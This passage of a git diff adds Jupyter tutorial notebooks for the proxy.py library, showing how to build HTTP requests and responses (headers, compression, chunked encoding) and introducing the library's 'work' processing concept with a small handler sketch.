+    "Previously, we saw how to parse HTTP responses using `HttpParser`. We also saw how the `HttpParser` class is capable of parsing various types of HTTP protocols. Remember the _take away_ from that tutorial."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "from proxy.http.parser import HttpParser, httpParserTypes\n",
+    "from proxy.http import httpMethods\n",
+    "from proxy.common.constants import HTTP_1_1\n",
+    "\n",
+    "request = HttpParser(httpParserTypes.REQUEST_PARSER)\n",
+    "request.path, request.method, request.version = b'/', httpMethods.GET, HTTP_1_1\n",
+    "request.add_header(b'Host', b'jaxl.com')\n",
+    "\n",
+    "print(request.build())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "But this is a painful way to construct request packets. Hence, other higher-level abstractions are available.\n",
+    "\n",
+    "For example, the following one-liner will give us the same request packet."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\n\\r\\n'"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from proxy.common.utils import build_http_request\n",
+    "\n",
+    "build_http_request(\n",
+    "    method=httpMethods.GET,\n",
+    "    url=b'/',\n",
+    "    headers={b'Host': b'jaxl.com'},\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "`build_http_request` adds a `User-Agent` header by default. You can also provide your own:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: my app v1\\r\\n\\r\\n'"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "build_http_request(\n",
+    "    method=httpMethods.GET,\n",
+    "    url=b'/',\n",
+    "    headers={\n",
+    "        b'Host': b'jaxl.com',\n",
+    "        b'User-Agent': b'my app v1'\n",
+    "    },\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Or, if you don't want a `User-Agent` header at all, pass `no_ua=True`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "build_http_request(\n",
+    "    method=httpMethods.GET,\n",
+    "    url=b'/',\n",
+    "    headers={b'Host': b'jaxl.com'},\n",
+    "    no_ua=True,\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "To add a `Connection: close` header, simply pass `conn_close=True`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\n'"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "build_http_request(\n",
+    "    method=httpMethods.GET,\n",
+    "    url=b'/',\n",
+    "    headers={b'Host': b'jaxl.com'},\n",
+    "    conn_close=True,\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "For `POST` requests, provide the `body` argument"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+
"metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'POST / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 21\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\nkey=value&hello=world'" + ] + }, + "execution_count": 6, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "build_http_request(\n", + " method=httpMethods.POST,\n", + " url=b'/',\n", + " headers={b'Host': b'jaxl.com'},\n", + " body=b'key=value&hello=world',\n", + " content_type=b'application/x-www-form-urlencoded',\n", + " conn_close=True,\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "For chunked data, simply include a `Transfer-Encoding` header. This will omit the `Content-Length` header then:" + ] + }, + { + "cell_type": "code", + "execution_count": 9, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'POST / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\n5\\r\\nkey=v\\r\\n5\\r\\nalue&\\r\\n5\\r\\nhello\\r\\n5\\r\\n=worl\\r\\n1\\r\\nd\\r\\n0\\r\\n\\r\\n'" + ] + }, + "execution_count": 9, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "from proxy.http.parser import ChunkParser\n", + "\n", + "build_http_request(\n", + " method=httpMethods.POST,\n", + " url=b'/',\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " b'Transfer-Encoding': b'chunked',\n", + " },\n", + " body=ChunkParser.to_chunks(b'key=value&hello=world', chunk_size=5),\n", + " content_type=b'application/x-www-form-urlencoded',\n", + " conn_close=True,\n", + ")" + ] + } + ], + "metadata": { + "interpreter": { + "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7" + }, + "kernelspec": { + "display_name": "Python 3.10.0 64-bit ('venv310': venv)", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.10.0" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +} diff --git a/tutorial/responses.ipynb b/tutorial/responses.ipynb new file mode 100644 index 0000000000..f74f2eb0ab --- /dev/null +++ b/tutorial/responses.ipynb @@ -0,0 +1,328 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Http Response\n", + "\n", + "## Usage\n", + "\n", + "To construct a response packet you have a variety of facilities available.\n", + "\n", + "Previously we saw how to parse HTTP responses using `HttpParser`. Of-course, we can also construct a response packet using `HttpParser` class." 
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nContent-Length: 0\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "from proxy.http.parser import HttpParser, httpParserTypes\n",
+    "from proxy.common.constants import HTTP_1_1\n",
+    "\n",
+    "response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n",
+    "response.code = b'200'\n",
+    "response.reason = b'OK'\n",
+    "response.version = HTTP_1_1\n",
+    "\n",
+    "print(response.build_response())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "But this is a painful way to construct responses. Hence, other higher-level abstractions are available.\n",
+    "\n",
+    "For example, the following one-liner will give us the same response packet."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nContent-Length: 0\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "from proxy.http.responses import okResponse\n",
+    "\n",
+    "print(okResponse().tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Notice how `okResponse` will always add a `Content-Length` header for you.\n",
+    "\n",
+    "You can also customize other headers"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Length: 0\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    headers={\n",
+    "        b'X-Custom-Header': b'my value',\n",
+    "    },\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Let's add some content to our response packet"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Length: 11\\r\\n\\r\\nHello World'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    content=b'Hello World',\n",
+    "    headers={\n",
+    "        b'X-Custom-Header': b'my value',\n",
+    "    },\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Note how `okResponse` automatically computed the `Content-Length` header for us.\n",
+    "\n",
+    "Depending upon the `--min-compression-length` flag, `okResponse` will also compress the content.\n",
+    "\n",
+    "For example, the default value for minimum compression length is 20."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Encoding: gzip\\r\\nContent-Length: 23\\r\\n\\r\\n\\x1f\\x8b\\x08\\x00F\\x0e\\xf1a\\x02\\xff\\xf3\\xf0\\xc0\\x02\\x00h\\x81?s\\x15\\x00\\x00\\x00'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    content=b'H' * 21,\n",
+    "    headers={\n",
+    "        b'X-Custom-Header': b'my value',\n",
+    "    },\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can pass a custom value for the `min_compression_length` kwarg to `okResponse`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nHost: jaxl.com\\r\\nContent-Length: 21\\r\\n\\r\\nHHHHHHHHHHHHHHHHHHHHH'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    content=b'H' * 21,\n",
+    "    headers={\n",
+    "        b'Host': b'jaxl.com',\n",
+    "    },\n",
+    "    min_compression_length=21,\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Internally, `okResponse` uses `build_http_response`, hence you can also pass any argument accepted by `build_http_response`. For example, it supports a `conn_close` argument, which will add a `Connection: close` header. Simply pass `conn_close=True`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nHost: jaxl.com\\r\\nContent-Length: 11\\r\\nConnection: close\\r\\n\\r\\nHello World'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    content=b'Hello World',\n",
+    "    headers={\n",
+    "        b'Host': b'jaxl.com',\n",
+    "    },\n",
+    "    conn_close=True,\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Chunked Encoding\n",
+    "\n",
+    "You can also send chunked-encoded responses."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n5\\r\\nHello\\r\\n5\\r\\n Worl\\r\\n1\\r\\nd\\r\\n0\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "from proxy.http.parser import ChunkParser\n",
+    "\n",
+    "chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5)\n",
+    "response = okResponse(\n",
+    "    content=chunks,\n",
+    "    headers={\n",
+    "        b'Transfer-Encoding': b'chunked',\n",
+    "    },\n",
+    "    # Avoid compressing chunks for demo purposes here.\n",
+    "    # Ideally you should omit this kwarg and send\n",
+    "    # compressed chunks.\n",
+    "    min_compression_length=len(chunks),\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If we omit the `min_compression_length` kwarg, the chunked body itself gets compressed:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\nContent-Encoding: gzip\\r\\n\\r\\n\\x1f\\x8b\\x08\\x00\\xd3\\n\\xf1a\\x02\\xff3\\xe5\\xe5\\xf2H\\xcd\\xc9\\xc9\\xe7\\xe52\\xe5\\xe5R\\x08\\xcf/\\xca\\xe1\\xe52\\xe4\\xe5J\\xe1\\xe52\\xe0\\xe5\\xe2\\xe5\\x02\\x00\\x90S\\xbb/\\x1f\\x00\\x00\\x00'\n"
+     ]
+    }
+   ],
+   "source": [
+    "response = okResponse(\n",
+    "    content=chunks,\n",
+    "    headers={\n",
+    "        b'Transfer-Encoding': b'chunked',\n",
+    "    },\n",
+    ")\n",
+    "\n",
+    "print(response.tobytes())"
+   ]
+  }
+ ],
+ "metadata": {
+  "interpreter": {
+   "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.10.0 64-bit ('venv310': venv)",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.10.0"
+  },
+  "orig_nbformat": 4
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/tutorial/welcome.ipynb b/tutorial/welcome.ipynb
new file mode 100644
index 0000000000..12d0983f0e
--- /dev/null
+++ b/tutorial/welcome.ipynb
@@ -0,0 +1,61 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Welcome\n",
+    "\n",
+    "## Background\n",
+    "\n",
+    "`proxy.py` was released on 20th August 2013 as a single-file HTTP proxy server implementation with no external dependencies. See the [first commit](https://github.com/abhinavsingh/proxy.py/commit/75044a72d9c7b4b8910ba551006b801eafdf3c47) and [read the introductory blog](https://abhinavsingh.com/proxy-py-a-lightweight-single-file-http-proxy-server-in-python/) to get an insight into why `proxy.py` was created.\n",
+    "\n",
+    "## Introduction\n",
+    "\n",
+    "Today, `proxy.py` has matured into a full-blown networking library with a focus on being lightweight and extensible while delivering maximum performance. Unlike other Python servers, `proxy.py` doesn't need a `WSGI` or `uWSGI` frontend, which then usually has to be placed behind a reverse proxy, e.g. `Nginx` or `Apache`. Of course, `proxy.py` can be placed directly behind a load balancer _(optionally capable of speaking the HA proxy protocol)_.\n",
+    "\n",
+    "## Asyncio\n",
+    "\n",
+    "TBD\n",
+    "\n",
+    "## The Concept Of Work\n",
+    "\n",
+    "The `proxy.py` core is written around a high-level concept of `work`.\n",
+    "\n",
+    "- A running instance can receive `work` from one or multiple `sources`\n",
+    "  - For example, when `proxy.py` starts, an accepted client connection is `work` coming from a TCP socket `source`\n",
+    "- Handlers can be written to process various types of `work`\n",
+    "  - For example, `HttpProtocolHandler` handles HTTP client connection `work`\n",
+    "- A client connection can come from a variety of `sources`\n",
+    "  - TCP sockets\n",
+    "  - UDP sockets\n",
+    "  - Unix sockets\n",
+    "  - Raw sockets\n",
+    "\n",
+    "In fact, `work` can be any processing unit. It doesn't have to be a client connection. For example:\n",
+    "\n",
+    "- A file on disk can act as the `source` and each line in that file as a `work` definition\n",
+    "- Imagine tailing a file on disk as the `source` and processing each line as a separate `work` object\n",
+    "- If you want, each line in the file can be a URL to be scraped or downloaded\n",
+    "- If you want, your `work` handlers can append new URLs _(discovered by scraping previously processed URLs)_ back into the file, creating an infinite feedback loop with the `work` processing core\n",
+    "\n",
+    "And just like that we have created a web scraper!!!\n",
+    "\n",
+    "To extend this generic concept, now imagine a distributed queue as the `source` of our `work`, where each published message in the queue is our `work` payload. Some examples of such `sources` can be:\n",
+    "\n",
+    "- A `Redis` channel\n",
+    "- A Google Cloud PubSub channel\n",
+    "- Kafka queues\n",
+    "\n",
+    "And just like that we have created a distributed `work` executor!!!\n",
+    "\n",
+    "A minimal sketch of a custom `work` payload and its handler follows below."
+   ]
+  },
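+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## A Minimal Work Sketch\n",
+    "\n",
+    "Below is a minimal, illustrative sketch of the `work` concept, assuming the `Work` base class exported by `proxy.core.work` _(see `examples/task.py` in the repository for a complete, runnable version)_. The `LineTask` and `LineTaskWork` names are hypothetical and not part of `proxy.py` itself."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from typing import Any\n",
+    "\n",
+    "from proxy.core.work import Work\n",
+    "\n",
+    "\n",
+    "class LineTask:\n",
+    "    # Our hypothetical work payload, e.g. a single\n",
+    "    # line tailed from a file on disk.\n",
+    "    def __init__(self, payload: bytes) -> None:\n",
+    "        self.payload = payload\n",
+    "\n",
+    "\n",
+    "class LineTaskWork(Work[LineTask]):\n",
+    "    # Handler class created by the core for each received\n",
+    "    # work payload.  The core doesn't know how to construct\n",
+    "    # our payload objects, so we provide a factory here.\n",
+    "    @staticmethod\n",
+    "    def create(*args: Any) -> LineTask:\n",
+    "        return LineTask(*args)"
+   ]
+  }
+ ],
+ "metadata": {
+  "language_info": {
+   "name": "python"
+  },
+  "orig_nbformat": 4
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}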